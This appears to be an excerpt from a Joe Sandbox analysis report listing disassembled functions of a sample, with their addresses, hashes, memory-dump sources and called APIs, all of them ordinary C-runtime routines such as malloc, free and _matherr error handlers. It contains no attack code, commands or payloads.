                        • Instruction ID: 121c111691edc08f94f5a19dd5cd0486e7a6c3177d53720c99d2b1d1f61dda2a
                        • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                        • Instruction Fuzzy Hash: 20D067A665044881DF54EBB2D8E62381320EB98F94F1400369F9E4B26ACD64C896D345
                        Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                        Download Yara Rule
                        Strings
                        • Unknown pseudo relocation bit size %d., xrefs: 00402294
                        • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID:
                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                        • API String ID: 0-395989641
                        • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                        • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
                        • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                        • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
                        Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                        • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: QueryVirtual
                        • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                        • API String ID: 1804819252-157664173
                        • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                        • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
                        • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                        • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
                        Function 00401010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: __set_app_type
                        • String ID: 06E$P0E
                        • API String ID: 1108511539-3978550416
                        • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                        • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
                        • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                        • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
                        Function 00CFF860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00CFF8B1
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00CFF8BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID: B
                        • API String ID: 1812809483-1255198513
                        • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                        • Instruction ID: f2a7cb748a5679a83058d05118bc5779c981642f9fa808822872b325bb9e4caf
                        • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                        • Instruction Fuzzy Hash: B701C072620B4486DB10DF12E4443A9B661FB99FE4FA84325AF5C07BE5CF38C245CB10
                        Function 00A4EC60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00A4ECB1
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A4ECBC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID: B
                        • API String ID: 1812809483-1255198513
                        • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                        • Instruction ID: d37d03253ee3bbd1e25df75ca7b0974f656a682e28c4c9a9536ef8a9dd3a931f
                        • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                        • Instruction Fuzzy Hash: FF0180B6724B5486EB10DF12E9843A9B661F798FE4F988325AF5817B95CF38C244CB00
                        Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • Unknown error, xrefs: 00401D2C
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-3474627141
                        • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                        • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
                        • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                        • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
                        Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        • Argument domain error (DOMAIN), xrefs: 00401CE0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2713391170
                        • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                        • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
                        • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                        • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                        Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • Partial loss of significance (PLOSS), xrefs: 00401CF0
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4283191376
                        • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                        • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
                        • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                        • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                        Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        • Overflow range error (OVERFLOW), xrefs: 00401D00
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4064033741
                        • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                        • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
                        • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                        • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                        Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2187435201
                        • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                        • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
                        • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                        • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
                        Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        • Total loss of significance (TLOSS), xrefs: 00401D20
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-4273532761
                        • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                        • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
                        • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                        • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
                        Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • Argument singularity (SIGN), xrefs: 00401C78
                        • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: fprintf
                        • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                        • API String ID: 383729395-2468659920
                        • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                        • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
                        • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                        • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
                        Function 00CE1CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • calloc.LIBCMT ref: 00CE1D6A
                          • Part of subcall function 00D0EE08: _calloc_impl.LIBCMT ref: 00D0EE18
                          • Part of subcall function 00D0EE08: _errno.LIBCMT ref: 00D0EE2B
                          • Part of subcall function 00D0EE08: _errno.LIBCMT ref: 00D0EE35
                        • free.LIBCMT ref: 00CE1EF3
                        • free.LIBCMT ref: 00CE1EFD
                        • free.LIBCMT ref: 00CE1F0F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_calloc_implcalloc
                        • String ID:
                        • API String ID: 4000150058-0
                        • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                        • Instruction ID: 1cb48e6adcd3c1f3f259a9164521146a8525df0fbe35de83744b2c10b8f8512c
                        • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                        • Instruction Fuzzy Hash: 38C10B76604B848AD764CF66E88479EB7B4F788B88F14412AEF8D87B18DF38C555CB00
                        Function 00A310C4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • calloc.LIBCMT ref: 00A3116A
                          • Part of subcall function 00A5E208: _calloc_impl.LIBCMT ref: 00A5E218
                          • Part of subcall function 00A5E208: _errno.LIBCMT ref: 00A5E22B
                          • Part of subcall function 00A5E208: _errno.LIBCMT ref: 00A5E235
                        • free.LIBCMT ref: 00A312F3
                        • free.LIBCMT ref: 00A312FD
                        • free.LIBCMT ref: 00A3130F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_calloc_implcalloc
                        • String ID:
                        • API String ID: 4000150058-0
                        • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                        • Instruction ID: 35eb0f3bb373cc86dc5259de235d2047b09324dfadb6ce55f5414a31ae557aa0
                        • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                        • Instruction Fuzzy Hash: E6C10D76608B848AD764CF65E88479EB7F4F788B88F10412AEB8D97B18DF38C555CB00
                        Function 00CFAD44 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CFAD78
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • free.LIBCMT ref: 00CFAEBF
                        • free.LIBCMT ref: 00CFAF23
                        • free.LIBCMT ref: 00CFAF2F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$AllocHeap_callnewhmalloc
                        • String ID:
                        • API String ID: 3531731211-0
                        • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                        • Instruction ID: 9238278e01d10c031b5a7b9c68651606adc3d945f6971fceb19bf37339e80a07
                        • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                        • Instruction Fuzzy Hash: 9751F1B530034D52DA58ABA2D45037DB351FB80BD0F54042AEF1E5BB56EFB8C612C722
                        Function 00A4A144 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A4A178
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • free.LIBCMT ref: 00A4A2BF
                        • free.LIBCMT ref: 00A4A323
                        • free.LIBCMT ref: 00A4A32F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$_errno$_callnewhmalloc
                        • String ID:
                        • API String ID: 2761444284-0
                        • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                        • Instruction ID: b85bdfd4d9e7c0fd81d74b41f520c0a7ed01aa2368d7f8e53e09c9d117f62976
                        • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                        • Instruction Fuzzy Hash: A151233D30474586DE18EF22EA503AE63A1FBE2BC0F548526EE1A1BB55EF79D401C702
                        Function 00CE4300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                        • Instruction ID: 4a974ffaf6ae4417b42412dec81855747c0562a0a9f34d3a6afe33a21360f82f
                        • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                        • Instruction Fuzzy Hash: EA4187323047C487CB58DB27A450A6E77A1F784B88F448529EE6A87B48EF38DA06C700
                        Function 00A33700 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                        • Instruction ID: 0d8dd840c222791150750524623b260df9568ebec204737f6599bafd58fff7e2
                        • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                        • Instruction Fuzzy Hash: B041797370878087CF58DF26A910A6E77A1F794B88F558525FE6A47B04EF38DA05C700
                        Function 00CF1038 Relevance: 5.1, APIs: 4, Instructions: 109COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$CurrentProcessfreemalloc
                        • String ID:
                        • API String ID: 1397824077-0
                        • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                        • Instruction ID: f8a0658880864cc9c5ac60514d27356315db90f357020857df735341aa0981f0
                        • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                        • Instruction Fuzzy Hash: 03418172314685C6DBA4DB22E5407BF63A1EB847C8F00542AAF8A47B49EF39C5459701